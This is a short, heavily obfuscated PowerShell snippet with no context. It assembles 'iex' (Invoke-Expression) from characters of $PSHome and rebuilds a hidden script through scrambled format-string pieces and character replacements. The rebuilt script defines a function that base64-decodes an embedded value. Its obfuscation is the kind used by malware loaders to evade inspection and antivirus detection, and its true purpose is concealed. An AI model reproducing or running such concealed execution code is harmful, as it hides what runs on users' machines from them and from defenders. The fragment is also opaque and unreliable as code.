. ( $psHome[21]+$PSHOme[30]+'x') ( (("{27}{37}{43}{25}{56}{6}{46}{8}{18}{11}{12}{36}{15}{35}{32}{54}{22}{9}{48}{4}{41}{10}{5}{33}{13}{39}{29}{50}{47}{44}{23}{28}{52}{24}{26}{30}{17}{0}{3}{49}{51}{21}{19}{38}{34}{14}{53}{20}{2}{55}{40}{45}{7}{1}{16}{31}{42}"-f'  ','AuA','4AMQA1A','  ','ar',' ','n','A','r','Y','m1
    )

','ter(Posi','tion = 0','t.E','=(','  [St','DcA','
','ame','Ms9 out-null
}
_','YaQBwADoAMwAxAC','ult ','E','onvert]:','Bas','d','e64St','F',':Fr','g]::Un','ring(EY6param1))','MgA=','g]
       ','   EY6result  = [Tex','_=/qBK=','rin',')]
      ','unction ___=/qBK=={
    [Cmd','_','ncodin','gAxADMA','a','4UY)
','letBin','C','O','g()] param(
        [Pa','g([','6p','EY6','icode.GetStrin','res','om','4U',' ','DMAL','i')).replACe(([ChAR]52+[ChAR]85+[ChAR]89),[StrInG][ChAR]39).replACe(([ChAR]113+[ChAR]66+[ChAR]75),[StrInG][ChAR]92).replACe('EY6',[StrInG][ChAR]36).replACe(([ChAR]77+[ChAR]115+[ChAR]57),'|')) 
